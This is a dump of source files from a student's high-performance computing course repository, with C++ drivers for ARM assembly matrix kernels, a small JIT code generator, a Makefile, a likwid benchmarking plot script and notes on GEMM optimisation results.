"blob_id": "f704c95105346a989cb75de6d2bcdba0b8be7b94", "content_id": "65e63c37edd72ac79eff035e18612b44300b9063", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 24, "license_type": "no_license", "max_line_length": 23, "num_lines": 1, "path": "/algorithms/__init__.py", "repo_name": "sheepsy90/InteractiveMachineLearning", "src_encoding": "UTF-8", "text": "__author__ = 'rkessler'\n" }, { "alpha_fraction": 0.5087273716926575, "alphanum_fraction": 0.5369724035263062, "avg_line_length": 26.8938045501709, "blob_id": "cbe896ad653d7fefc20db0fd1152385a7ba404d5", "content_id": "887cd07d6471b2d0b31454f7c1fe0355a153f26b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3151, "license_type": "no_license", "max_line_length": 82, "num_lines": 113, "path": "/interactiveKNearestNeighbour.py", "repo_name": "sheepsy90/InteractiveMachineLearning", "src_encoding": "UTF-8", "text": "import pygame\nimport math\nfrom algorithms.KNearestNeighbour import KNN\n\n#defining color variables\nBLACK = (0, 0, 0)\nWHITE = (190, 190, 190)\nRED = (255, 0, 0)\nGREEN = (0, 255, 0)\nBLUE = (0, 0,255)\nYELLOW = (255, 255, 0)\n\ncolour_by_class = {\n 1: RED,\n 2: GREEN,\n 3: BLUE,\n 4: YELLOW\n}\n\n#window settings\nsize = (800, 800)\npygame.init()\nscreen = pygame.display.set_mode(size)\npygame.display.set_caption(\"K-Nearest-Neighbour\")\nfont = pygame.font.Font(None, 36)\n\n#setting fps variable\nclock = pygame.time.Clock()\n\n# State Variables\ndone = False\nknn_storage = KNN(4)\ncurrent_k = 1\ndraw_area = False\ndraw_lines = False\n\nwhile not done:\n pos = pygame.mouse.get_pos()\n\n for event in pygame.event.get():\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_ESCAPE:\n done = True\n if event.key == pygame.K_0:\n knn_storage.clear()\n if event.key == pygame.K_1:\n knn_storage.add_data_point(1, pos)\n break\n if event.key == pygame.K_2:\n knn_storage.add_data_point(2, pos)\n break\n if event.key == pygame.K_3:\n knn_storage.add_data_point(3, pos)\n break\n if event.key == pygame.K_4:\n knn_storage.add_data_point(4, pos)\n break\n if event.key == pygame.K_PLUS:\n current_k += 1\n break\n if event.key == pygame.K_MINUS:\n current_k -= 1\n current_k = max(1, current_k)\n break\n if event.key == pygame.K_a:\n draw_area = not draw_area\n break\n if event.key == pygame.K_l:\n draw_lines = not draw_lines\n break\n\n screen.fill(BLACK)\n\n if draw_area:\n for i in range(0, size[0], 20):\n for j in range(0, size[0], 20):\n x,y = i+10, j+10\n result = knn_storage.estimate(current_k, (i, j))\n\n if result is not None and not math.isnan(result):\n pygame.draw.circle(screen, colour_by_class[result], (i, j), 1)\n\n\n data_points = knn_storage.get_data_points()\n # First draw all points on screen\n for pnt in data_points:\n pygame.draw.circle(screen, colour_by_class[pnt[1]], pnt[0], 5)\n\n # Draw the current k\n text = font.render(str(\"Curent K: \" + str(current_k)), True, WHITE)\n screen.blit(text, (10,10))\n\n text = font.render(str(\"FPS: \" + str(int(clock.get_fps()))), True, WHITE)\n screen.blit(text, (700,10))\n\n if draw_lines:\n # Estimate the mouse cursors colour\n result = knn_storage.estimate_and_get_nearest(current_k, pos)\n\n if result is not None:\n m_label, pnts = result\n\n if not math.isnan(m_label):\n for element in pnts:\n dst, label, tpos = element\n pygame.draw.line(screen, colour_by_class[label], pos, tpos, 2)\n\n pygame.draw.circle(screen, colour_by_class[m_label], pos, 8)\n\n pygame.display.flip()\n clock.tick(60)\n\npygame.quit()" }, { "alpha_fraction": 0.5631793737411499, "alphanum_fraction": 0.5754076242446899, "avg_line_length": 26.79245376586914, "blob_id": "f7ba57dee4c4c993feb464421f2bb2b67d2a0cd8", "content_id": "1a12c43d816b105a0b18158d3d29c66a5bd50030", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1472, "license_type": "no_license", "max_line_length": 112, "num_lines": 53, "path": "/algorithms/KMeans.py", "repo_name": "sheepsy90/InteractiveMachineLearning", "src_encoding": "UTF-8", "text": "import math\n\n\nclass KMeans():\n\n def __init__(self):\n self.centroids = {}\n self.data_points = []\n\n def clear(self):\n self.centroids = {}\n self.data_points = []\n\n def add_data_point(self, pnt):\n self.data_points.append(pnt)\n\n def add_centroid(self, pnt):\n if 0 <= len(self.centroids) < 4:\n self.centroids[len(self.centroids)] = pnt\n\n def get_data(self):\n return self.data_points\n\n def get_centroids(self):\n return self.centroids\n\n def set_new_centers(self, new_centroids):\n if str(new_centroids) == str(self.centroids):\n return True\n else:\n self.centroids = new_centroids\n return False\n\n def kMeans_assignment(self):\n assignments = {}\n for pnt in self.data_points:\n distances = [(self.calculate_euclidean_distance(pnt, self.centroids[k]), k) for k in self.centroids]\n distances = sorted(distances, key=lambda x: x[0])\n assignment = distances[:1][0]\n\n if assignment[1] not in assignments:\n assignments[assignment[1]] = []\n\n assignments[assignment[1]].append(pnt)\n\n return assignments\n\n def calculate_euclidean_distance(self, e1, e2):\n assert len(e1) == len(e2)\n return math.sqrt(sum([(e1[i] - e2[i])**2 for i in range(len(e1))]))\n\n def can_be_started(self):\n return len(self.centroids) > 0 and len(self.data_points) > 0" }, { "alpha_fraction": 0.5450398921966553, "alphanum_fraction": 0.5610034465789795, "avg_line_length": 29.241378784179688, "blob_id": "5948ac491cf4f1b3cf6338d60f08e3e9d4bd001d", "content_id": "135a5bb4f78c6b5ed546aaaeaab4a5266e8c46fe", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 877, "license_type": "no_license", "max_line_length": 76, "num_lines": 29, "path": "/algorithms/NaiveBayesTest.py", "repo_name": "sheepsy90/InteractiveMachineLearning", "src_encoding": "UTF-8", "text": "import random\nimport unittest\nfrom algorithms.NaiveBayes import NaiveBayes\n\n\nclass TestNaiveBayes(unittest.TestCase):\n\n def test_with_data_set(self):\n with open(\"../data_sets/pima-indians-diabetes.data\", 'r') as f:\n data = f.read()\n data = data.split(\"\\n\")\n data = [d.split(\",\") for d in data[0:len(data)-1]]\n data = [[float(p) for p in d] for d in data]\n\n random.shuffle(data)\n train, test = data[:int(len(data)*0.67)], data[int(len(data)*0.67):]\n\n nb = NaiveBayes()\n for element in train:\n nb.add_data_point(element[-1], element[0:len(element)-1])\n nb.build_model()\n\n success = 0\n\n for element in test:\n if int(element[-1]) == nb.predict(element):\n success += 1\n\n print \"Result:\", success, len(test), success / float(len(test))\n" } ]
10
mohammedrahamadulla/python-programs
https://github.com/mohammedrahamadulla/python-programs
2ff4b1971d9d99c7c49c5e98e4ac7452c548d1c7
5c68a6d6a6af9c29489c63e862bdfbb6cb3eaba0
b2e1d8ff1195bb8afd1304b97c8b825455e83689
refs/heads/master
2021-08-24T06:31:07.517331
2017-12-08T12:19:20
2017-12-08T12:19:20
113,567,460
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7013274431228638, "alphanum_fraction": 0.7168141603469849, "avg_line_length": 31.285715103149414, "blob_id": "5d8b72d2630ac276f25177788ac2f17a7a9177e9", "content_id": "8ad883ecd4de8f452ca350a9eaed49ce80af4492", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 452, "license_type": "no_license", "max_line_length": 60, "num_lines": 14, "path": "/frstprgm.py", "repo_name": "mohammedrahamadulla/python-programs", "src_encoding": "UTF-8", "text": "def apply_discount(amount):\n discount = 10\n final_amount = amount - (amount*discount)/100\n return final_amount\n\n#To take input from users\nno_of_prods = int(input(\"Enter the number of products: \"))\n\nbill_amount = (no_of_prods)*30\nprint(\"Your bill before discount - \",bill_amount)\n\nfinal_bill_amount = apply_discount(bill_amount)\nprint(\"Your Final bill after discount - \",final_bill_amount)\nprint(\"you saved - \",bill_amount - final_bill_amount)\n" } ]
1
Seeethy/Hamming-7-4
https://github.com/Seeethy/Hamming-7-4
42900d7b7d4b335eeca368d7a270e9b81b8b9884
79c382d4f7eb211fd77ea4a0ea37d42d174fe169
1f72183f97d97064d8fc42f9f660ae59a46e1c16
refs/heads/main
2023-03-09T01:08:07.101755
2021-03-01T10:23:42
2021-03-01T10:23:42
343,373,927
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7262773513793945, "alphanum_fraction": 0.7408758997917175, "avg_line_length": 44.66666793823242, "blob_id": "ea9073d2c930c29b508844672a105c8dfe707487", "content_id": "c6c08514c6175b8f05b21a1cca617cc80e0caf60", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 274, "license_type": "no_license", "max_line_length": 100, "num_lines": 6, "path": "/README.md", "repo_name": "Seeethy/Hamming-7-4", "src_encoding": "UTF-8", "text": "# Hamming-7-4-\n\n## Setup\nCode of the project is stored in **Hamming(7,4).py** file.<br /><br />\nOpen .py file in any environment used in computer programming which allows you to program in python.\nYou will need to install or input two python libraries: math and matplotlib.\n" }, { "alpha_fraction": 0.48057883977890015, "alphanum_fraction": 0.5571210980415344, "avg_line_length": 25.914894104003906, "blob_id": "73e728da662afeb4cfa23db3899d5df416b10a8e", "content_id": "a2fad3ecb7fed6ca7050bdf80d228d280a67bef3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2640, "license_type": "no_license", "max_line_length": 106, "num_lines": 94, "path": "/Hamming(7,4).py", "repo_name": "Seeethy/Hamming-7-4", "src_encoding": "WINDOWS-1250", "text": "\"\"\"\r\n1)Bity na wejściu dla stringa \"Adam\"\r\n0,1,0,0,0,0,0,1,0,1,1,0,0,1,0,0,0,1,1,0,0,0,0,1,0,1,1,0,1,1,0,1\r\n2)W przykładzie przekłamuje pierwszy bit w pierwszej tablicy ktora wychodzi z outputu funkcji Hamming 7.4:\r\n1,0,0,1,1,0,0 ----> 0,0,0,1,1,0,0\r\n3) Output demodulacji:\r\nRozpoznanie przeklamanego bitu ( pozycja 1)\r\nBity na wyjściu:\r\n0,1,0,0,0,0,0,1,0,1,1,0,0,1,0,0,0,1,1,0,0,0,0,1,0,1,1,0,1,1,0,1\r\n\"\"\"\r\n# funkcia S2BS uproszczona dla tej laborki\r\ndef S2BS( napis ):\r\n b = [bin(ord(x))[2:].zfill(8) for x in napis]\r\n global zwracana_wartosc\r\n for x in b:\r\n zwracana_wartosc = \"\".join(b)\r\n return (zwracana_wartosc)\r\n\r\nnapiss = input(\"Podaj napis: \")\r\nS2BS(napiss)\r\n\r\n# zad1 - funkcja hamminga\r\n\r\nX = []\r\n\r\nfor i in range(len(zwracana_wartosc)):\r\n if zwracana_wartosc[i] =='1':\r\n X.append(1)\r\n if zwracana_wartosc[i] =='0':\r\n X.append(0)\r\n\r\n#X = Array(X)\r\nprint(\"Bity na wejściu: \")\r\nprint(\"\",X)\r\n\r\nimport numpy as np\r\n\r\ndef Hamming74():\r\n G = np.array([(1,1,0,1), (1,0,1,1),(1,0,0,0),(0,1,1,1),(0,1,0,0),(0,0,1,0),(0,0,0,1)])\r\n \r\n pakiet = np.zeros( (int(len(X)/4), 4) )\r\n global h\r\n h = []\r\n \r\n for i in range(0,len(pakiet),1): \r\n for j in range(0,4,1): \r\n pakiet[i][j] = X[j+4*i]\r\n hh = np.array(G.dot(pakiet[i])%2,dtype = np.uint64)\r\n h.append(hh)\r\n return h\r\n\r\nh = Hamming74()\r\n#print(h[0])\r\nprint(\"Przed przekłamaniem: \")\r\nprint(\"\",h[0])\r\ndef negacja(Xx,w1,w2):\r\n if Xx[w1][w2] == 0:\r\n Xx[w1][w2] = 1\r\n else:\r\n Xx[w1][w2] = 0\r\n return Xx\r\n\r\nnegacja(h,0,0)\r\nprint(\"Przykładowo przekłamuje 1 bit w 1 czesci:\")\r\nprint(\"Po przekłamaniu: \\n\",h[0])\r\nprint(\"Za pomocą demodulacji odnajduje pozycję przekłamanego bitu i zwracam to co w inpucie: \")\r\ndef demodulacja74():\r\n wektor_wyjsciowy = []\r\n for i in range(0,len(h),1): # długosc h (ilosc tablic)\r\n p1 = (h[i][0] + h[i][2] + h[i][4] + h[i][6]) % 2 \r\n p2 = (h[i][1] + h[i][2] + h[i][5] + h[i][6]) % 2\r\n p3 = (h[i][3] + h[i][4] + h[i][5] + h[i][6]) % 2\r\n n = p1 *2**0 + p2*2**1 + p3*2**2\r\n n = int(n)\r\n if n == 0:\r\n wektor_wyjsciowy.append(int(h[i][2]))\r\n wektor_wyjsciowy.append(int(h[i][4]))\r\n wektor_wyjsciowy.append(int(h[i][5]))\r\n wektor_wyjsciowy.append(int(h[i][6]))\r\n if n > 0:\r\n if h[i][n] == 1:\r\n h[i][n] = 0\r\n else:\r\n h[i][n] = 1\r\n print(\"Blad na indeksie: \", n)\r\n wektor_wyjsciowy.append(int(h[i][2]))\r\n wektor_wyjsciowy.append(int(h[i][4]))\r\n wektor_wyjsciowy.append(int(h[i][5]))\r\n wektor_wyjsciowy.append(int(h[i][6]))\r\n return wektor_wyjsciowy\r\n\r\ntest = demodulacja74()\r\nprint(\"Bity na wyjściu: \")\r\nprint(\"\",test)\r\n\r\n" } ]
2
MarkusFischer/hpc-class
https://github.com/MarkusFischer/hpc-class
528d61c388ab17d2cd9f6c0e4bb5615e9930f2bb
af36df155318fe8b4d822c337b43c7f9c05d9a42
71929c740838f708e2e44db2d3278a6319e67d28
refs/heads/main
2023-06-11T18:56:14.907381
2021-06-26T12:15:19
2021-06-26T12:15:19
358,349,225
1
0
null
null
null
null
null
[ { "alpha_fraction": 0.36796537041664124, "alphanum_fraction": 0.3782467544078827, "avg_line_length": 20, "blob_id": "3a9cfd501f4cef0eeba46545d4aa7ac1b366e2c0", "content_id": "42f50798bb6f9fae6f6127939e7c2a0ddc29819a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1848, "license_type": "no_license", "max_line_length": 79, "num_lines": 88, "path": "/exercise_4/src/util.cpp", "repo_name": "MarkusFischer/hpc-class", "src_encoding": "UTF-8", "text": "#include <cmath>\n#include <random>\n#include <iostream>\n\n#include \"util.hpp\"\n\nbool compare_matrices(float const* i_a,\n float const* i_b,\n unsigned int i_m,\n unsigned int i_n,\n unsigned int i_lda,\n unsigned int i_ldb,\n float eps,\n\t\t bool verbose)\n{\n for (size_t m = 0; m < i_m; ++m)\n {\n for (size_t n = 0; n < i_n; ++n)\n {\n if (std::abs(i_a[(n * i_lda) + m] - i_b[(n * i_ldb) + m]) > eps)\n\t {\n\t\t if (verbose)\n\t\t {\n\t\t std::cerr << \"Missmatch at m: \" << m << \" n: \" << n << std::endl;\n\t\t }\n return false;\n }\n }\n }\n return true;\n}\n\n\nfloat* random_matrix(unsigned int i_m, \n unsigned int i_n, \n unsigned int i_ld)\n{\n if (i_ld < i_m)\n {\n return nullptr;\n }\n \n std::random_device rd;\n \n std::mt19937 e2(rd());\n std::uniform_real_distribution<> dist(0, 1);\n \n float* matrix = new float[i_n * i_ld];\n \n for (size_t m = 0; m < i_ld; ++m)\n {\n for (size_t n = 0; n < i_n; ++n)\n {\n matrix[(n * i_ld) + m] = 0;\n }\n }\n \n for (size_t m = 0; m < i_m; ++m)\n {\n for (size_t n = 0; n < i_n; ++n)\n {\n matrix[(n * i_ld) + m] = dist(e2);\n }\n }\n return matrix;\n}\n\n\nfloat* zero_matrix(unsigned int i_m, \n unsigned int i_n, \n unsigned int i_ld)\n{\n if (i_ld < i_m)\n {\n return nullptr;\n }\n \n float* matrix = new float[i_n * i_ld];\n \n for (size_t m = 0; m < i_m; ++m)\n {\n for (size_t n = 0; n < i_n; ++n)\n {\n matrix[(n * i_ld) + m] = 0;\n }\n }\n return matrix;\n}\n" }, { "alpha_fraction": 0.7531914710998535, "alphanum_fraction": 0.7702127695083618, "avg_line_length": 28.375, "blob_id": "994be855901d0fbfa2d98e05f6e8f4790e9e767e", "content_id": "fb4b13e9d2c3d237b59094a573d98fda9ce86b41", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 235, "license_type": "no_license", "max_line_length": 84, "num_lines": 8, "path": "/README.md", "repo_name": "MarkusFischer/hpc-class", "src_encoding": "UTF-8", "text": "# hpc-class\nsolutions for high performance computing class at fsu jena in summer 2021\n\nclass url: https://scalable.uni-jena.de/opt/hpc/\n\n# compiling\n\nif not stated otherwise: use g++ -o exercisei exercise_i/exercise.cpp for exercise i\n" }, { "alpha_fraction": 0.4000000059604645, "alphanum_fraction": 0.418120801448822, "avg_line_length": 28.81999969482422, "blob_id": "ce38640e1b34fe7ef1b3a6cb4b3916b8f4e3bc4c", "content_id": "94a222474253bbd54253ab836e479f04d329a1f4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1490, "license_type": "no_license", "max_line_length": 75, "num_lines": 50, "path": "/exercise_9/mini_jit_base/src/generators/MyExample.cpp", "repo_name": "MarkusFischer/hpc-class", "src_encoding": "UTF-8", "text": "#include \"MyExample.h\"\n\nuint32_t ( *mini_jit::generators::MyExample::generate(uint32_t i_fac) )() {\n uint32_t l_ins = 0;\n\n // init output\n l_ins = instructions::Base::dpMovImm( 0,\n 1,\n 1 );\n m_kernel.addInstruction( l_ins );\n\n l_ins = instructions::Base::dpMovImm( 1,\n i_fac,\n 1 );\n m_kernel.addInstruction( l_ins );\n\n m_kernel.resetOffset();\n\n //multiply\n l_ins = instructions::Base::dpMulReg( 0, \n 1,\n 0, \n 1 );\n m_kernel.addInstruction( l_ins );\n\n // decrease loop-counter\n l_ins = instructions::Base::dpSubImm( 1,\n 1,\n 1,\n 1 );\n m_kernel.addInstruction( l_ins );\n\n int32_t l_jumpPc = -m_kernel.getOffset() / 4;\n l_ins = instructions::Base::bCbnz( 1,\n l_jumpPc,\n 1 );\n m_kernel.addInstruction( l_ins ); \n \n // ret\n l_ins = instructions::Base::bRet();\n m_kernel.addInstruction( l_ins );\n\n // we might debug through file-io\n std::string l_file = \"myexample.bin\";\n m_kernel.write( l_file.c_str() );\n\n m_kernel.setKernel();\n\n return (uint32_t (*)()) m_kernel.getKernel();\n}" }, { "alpha_fraction": 0.39638009667396545, "alphanum_fraction": 0.4280543029308319, "avg_line_length": 18.05172348022461, "blob_id": "43ad125c3a79e8f05f915843ee7396702c9d5946", "content_id": "dd8544c629cce2252104e5e9c5365d71abe4a691", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1105, "license_type": "no_license", "max_line_length": 99, "num_lines": 58, "path": "/exercise_5/task3/driver.cpp", "repo_name": "MarkusFischer/hpc-class", "src_encoding": "UTF-8", "text": "#include <cstdint>\n#include <cstdlib>\n#include <iostream>\n\nextern \"C\" {\n void copy_asm( uint32_t const * i_a,\n uint64_t * o_b );\n void copy_c( uint32_t const * i_a,\n uint64_t * o_b );\n}\n\nbool check_and_reset(uint32_t const * i_a, uint64_t* io_b)\n{\n bool same = true;\n for (int i = 0; i < 7; ++i)\n {\n\t//std::cout << \"i_a[\" << i << \"] : \" << i_a[i] << \" io_b[\" << i << \"] : \" << io_b[i] << std::endl;\n if (i_a[i] != io_b[i])\n {\n same = false;\n }\n io_b[i] = 0;\n }\n return same;\n}\n\nint main() {\n uint32_t l_a[7] = { 1, 21, 43, 78, 89, 91, 93 };\n uint64_t l_b[7] = { 0 };\n\n copy_asm( l_a,\n l_b );\n \n std::cout << \"copy_asm \";\n if (check_and_reset(l_a, l_b))\n {\n std::cout << \"succeed\" << std::endl;\n }\n else\n {\n std::cout << \"failed\" << std::endl;\n }\n\n copy_c( l_a,\n l_b );\n\n std::cout << \"copy_c \";\n if (check_and_reset(l_a, l_b))\n {\n std::cout << \"succeed\" << std::endl;\n }\n else\n {\n std::cout << \"failed\" << std::endl;\n }\n \n return EXIT_SUCCESS;\n}\n" }, { "alpha_fraction": 0.45205479860305786, "alphanum_fraction": 0.49098774790763855, "avg_line_length": 27.91666603088379, "blob_id": "7044cff658f1312d6de8453bf802cd6872509630", "content_id": "86d8d08b728c3f67feb316cfe5605edb29e595d4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1387, "license_type": "no_license", "max_line_length": 132, "num_lines": 48, "path": "/exercise_8/driver_sve2.cpp", "repo_name": "MarkusFischer/hpc-class", "src_encoding": "UTF-8", "text": "#include <iostream>\n#include <cstdint>\n\nextern \"C\" \n{\n void fmlalb_example(float* const a, float* const b, float* c);\n void fmlalt_example(float* const a, float* const b, float* c); \n void udot_example(float* const a, float* const b, float* c);\n}\n\n\nint main()\n{\n float dataIn1[128] = {0};\n float dataIn2[128] = {0};\n float dataOut[128] = {0};\n\n for (unsigned int i = 0; i < 128; ++i)\n {\n dataIn1[i] = (i + 1) * 2;\n dataIn2[i] = (i + 1) * 3;\n }\n\n std::cout << \"fmlalb kernel\" << std::endl;\n fmlalb_example(dataIn1, dataIn2, dataOut);\n\n for (unsigned int i = 0; i < 128; ++i)\n {\n std::cout << \"i / in1 / in2 / out: \" << i << \" / \" << dataIn1[i] << \" / \" << dataIn2[i] << \" / \" << dataOut[i] << std::endl;\n }\n\n\n std::cout << std::endl << std::endl << \"fmlalt kernel\" << std::endl;\n fmlalt_example(dataIn1, dataIn2, dataOut);\n\n for (unsigned int i = 0; i < 128; ++i)\n {\n std::cout << \"i / in1 / in2 / out: \" << i << \" / \" << dataIn1[i] << \" / \" << dataIn2[i] << \" / \" << dataOut[i] << std::endl;\n }\n\n std::cout << std::endl << std::endl << \"udot kernel\" << std::endl;\n udot_example(dataIn1, dataIn2, dataOut);\n\n for (unsigned int i = 0; i < 128; ++i)\n {\n std::cout << \"i / in1 / in2 / out: \" << i << \" / \" << dataIn1[i] << \" / \" << dataIn2[i] << \" / \" << dataOut[i] << std::endl;\n }\n}" }, { "alpha_fraction": 0.6689250469207764, "alphanum_fraction": 0.6689250469207764, "avg_line_length": 66.09091186523438, "blob_id": "4d2740e5b599cc1e8bb583fa3886278334a5fe9e", "content_id": "64f78ff3b2d4e2ef5dd86bd64d6fddf5cedb2700", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Makefile", "length_bytes": 2214, "license_type": "no_license", "max_line_length": 191, "num_lines": 33, "path": "/exercise_9/mini_jit_base/Makefile", "repo_name": "MarkusFischer/hpc-class", "src_encoding": "UTF-8", "text": "BUILD_DIR = ./build\nOPTIONS = -pedantic -Wall -Wextra -Werror\n\nmini_jit: src/driver.cpp src/instructions/Base.cpp src/instructions/Asimd.cpp src/backend/Kernel.cpp src/generators/Simple.cpp src/generators/Loop.cpp src/generators/MyExample.cpp\n\t\tg++ ${OPTIONS} -c src/instructions/Base.cpp -o ${BUILD_DIR}/instructions/Base.o\n\t\tg++ ${OPTIONS} -c src/instructions/Asimd.cpp -o ${BUILD_DIR}/instructions/Asimd.o\n\t\tg++ ${OPTIONS} -c src/backend/Kernel.cpp -o ${BUILD_DIR}/backend/Kernel.o\n\t\tg++ ${OPTIONS} -c src/generators/Simple.cpp -o ${BUILD_DIR}/generators/Simple.o\n\t\tg++ ${OPTIONS} -c src/generators/Loop.cpp -o ${BUILD_DIR}/generators/Loop.o\n\t\tg++ ${OPTIONS} -c src/generators/MyExample.cpp -o ${BUILD_DIR}/generators/MyExample.o\n\n\t\tg++ ${OPTIONS} src/driver.cpp ${BUILD_DIR}/instructions/Base.o ${BUILD_DIR}/instructions/Asimd.o \\\n\t\t ${BUILD_DIR}/backend/Kernel.o \\\n\t\t ${BUILD_DIR}/generators/Simple.o ${BUILD_DIR}/generators/Loop.o \\\n\t\t\t\t\t ${BUILD_DIR}/generators/MyExample.o \\\n\t\t -o ${BUILD_DIR}/mini_jit\n\ntest: src/test.cpp src/driver.cpp src/instructions/Base.cpp src/instructions/Asimd.cpp src/backend/Kernel.cpp src/generators/Simple.cpp src/generators/Loop.cpp src/instructions/Asimd.test.cpp\n\t\tg++ ${OPTIONS} -c src/instructions/Base.cpp -o ${BUILD_DIR}/instructions/Base.o\n\t\tg++ ${OPTIONS} -c src/instructions/Asimd.cpp -o ${BUILD_DIR}/instructions/Asimd.o\n\t\tg++ ${OPTIONS} -c src/instructions/Asimd.test.cpp -o ${BUILD_DIR}/instructions/Asimd.test.o\n\t\tg++ ${OPTIONS} -c src/backend/Kernel.cpp -o ${BUILD_DIR}/backend/Kernel.o\n\t\tg++ ${OPTIONS} -c src/generators/Simple.cpp -o ${BUILD_DIR}/generators/Simple.o\n\t\tg++ ${OPTIONS} -c src/generators/Loop.cpp -o ${BUILD_DIR}/generators/Loop.o\n\n\t\tg++ ${OPTIONS} src/test.cpp ${BUILD_DIR}/instructions/Base.o \\\n\t\t ${BUILD_DIR}/instructions/Asimd.o ${BUILD_DIR}/instructions/Asimd.test.o \\\n\t\t ${BUILD_DIR}/backend/Kernel.o \\\n\t\t ${BUILD_DIR}/generators/Simple.o ${BUILD_DIR}/generators/Loop.o \\\n\t\t -o ${BUILD_DIR}/test\n$(shell mkdir -p build/backend)\n$(shell mkdir -p build/instructions)\n$(shell mkdir -p build/generators)\n" }, { "alpha_fraction": 0.5521162152290344, "alphanum_fraction": 0.559065043926239, "avg_line_length": 34.977272033691406, "blob_id": "6f064b41c794e2b6e1e029c4468d9446451e0e67", "content_id": "38793eb1e5912611736ff3a66ec09215e802f05a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1583, "license_type": "no_license", "max_line_length": 126, "num_lines": 44, "path": "/exercise_1/vis.py", "repo_name": "MarkusFischer/hpc-class", "src_encoding": "UTF-8", "text": "import matplotlib.pyplot as plt\nimport subprocess\n\nbenchmarks = [\"peak_asimd_scalar_sp\", \"peak_asimd_scalar_dp\", \"peak_asimd_simd_sp\", \"peak_asimd_simd_dp\"]\n\nplt.figure()\nfor benchmark in benchmarks:\n print(benchmark)\n data_cores = []\n data_threads = []\n for i in range(1, 33):\n print(f\"Cores: {i}\")\n worker_string = \"S0:1GB:\" + str(i)\n benchmark_results = subprocess.run([\"likwid-bench\", \"-t\", benchmark, \"-w\", worker_string],\n capture_output=True).stdout\n splitted_string = str(benchmark_results).split('\\\\n')\n flops = 0\n for string in splitted_string:\n if string.startswith(\"MFlops/s:\"):\n flops = float(string.split(\"\\\\t\")[-1])\n break\n print((i, flops))\n data_cores.append((i, flops)) \n \n benchmark_results = subprocess.run([\"likwid-pin\", \"-c\", \"S0:0\", \"likwid-bench\", \"-t\", benchmark, \"-w\", worker_string],\n capture_output=True).stdout\n splitted_string = str(benchmark_results).split('\\\\n')\n flops = 0\n for string in splitted_string:\n if string.startswith(\"MFlops/s:\"):\n flops = float(string.split(\"\\\\t\")[-1])\n break\n print((i, flops))\n data_threads.append((i, flops))\n \n plt.scatter(*zip(*data_cores), label=\"cores \" + benchmark)\n plt.scatter(*zip(*data_threads), label=\"Threads \" + benchmark)\n \n\nplt.ylabel(\"MFLOP/s\")\n\nplt.xlabel(\"No. of cores/threads\") \nplt.legend()\nplt.savefig(\"benchmark.png\")\n" }, { "alpha_fraction": 0.3577863574028015, "alphanum_fraction": 0.43500643968582153, "avg_line_length": 21.852941513061523, "blob_id": "13faf3bb0fe7d753ec1152d0640c194463259efc", "content_id": "cae68fec41b6c466a283ca5fac925eb45b805b4d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 777, "license_type": "no_license", "max_line_length": 116, "num_lines": 34, "path": "/exercise_5/task4/driver.cpp", "repo_name": "MarkusFischer/hpc-class", "src_encoding": "UTF-8", "text": "#include <cstdint>\n#include <iostream>\n\n\nextern \"C\" \n{\nvoid gemm_asm_gp( uint32_t const * i_a,\n uint32_t const * i_b,\n uint32_t * io_c );\n\n}\n\nint main()\n{\n\n uint32_t a[8] = {1, 2, 3, 5, 7, 11, 13, 17};\n uint32_t b[4] = {1, 2, 3, 4};\n uint32_t c[8] = {1, 2, 3, 4, 5, 6, 7, 8};\n \n //NOTE more unit tests would be better but ... better than nothing\n uint32_t c_res[8] = {16, 26, 32, 43, 36, 56, 68, 91};\n \n gemm_asm_gp(a, b, c);\n \n std::cout << \"Comparing results... \" << std::endl;\n for (int i = 0; i < 8; ++i)\n {\n if (c[i] != c_res[i])\n {\n std::cout << \"Found mismatch at index \" << i << \" c:\" << c[i] << \" != c_res:\" << c_res[i] << std::endl; \n }\n }\n return 0;\n}\n" }, { "alpha_fraction": 0.6625824570655823, "alphanum_fraction": 0.7257304191589355, "avg_line_length": 49.52381134033203, "blob_id": "3aa578038cbf1c2fedf21bc0dbb1a67ff988f7f7", "content_id": "3bde721ea193bf1633755b4a2828cacdd86a0d10", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1061, "license_type": "no_license", "max_line_length": 348, "num_lines": 21, "path": "/exercise_6/solution.md", "repo_name": "MarkusFischer/hpc-class", "src_encoding": "UTF-8", "text": "# Optimizations\n\n## Baseline\n\nThe baseline approach is roughly the idea from the lecture. With this I achieved a performance of 20.30 GFLOPS.\n\n## No stack usage\n\nAs a first optimization stack I got ride of the stack usage. This meant, that I reordered the register usages. After this it was not necessary to save registers d8 to d15 (and the x registers) on the stack, saving store and load operations.\nThis increased the performance to 24.36 GFLOPS\n\n## Opposite store\n\nAs a final optimization step I tried to reorder the write back of the Matrix C to get ride of the first sub operation. That meant I stored the last column first then the second-last and so one. However, I gained no further performance boost. Instead compared to the non stack usage variant my performance dropped to 23.25 GFLOPS so I reverted back.\n\n# Best performing solutions\n\nName | time (s) | #executions | GFLOPS | %peak\n----------------------------------------------\nMarkus' ASM (16x4x4) | 2.10127 | 100000000 | 24.36 | 60.9\nMarkus' ASM (16x4x12) | 4.6028 | 100000000 | 33.37 | 83.4\n" }, { "alpha_fraction": 0.6076732873916626, "alphanum_fraction": 0.6608911156654358, "avg_line_length": 88.22222137451172, "blob_id": "f232daf9b69dfad393d0b1cf4b23a6509979ee6f", "content_id": 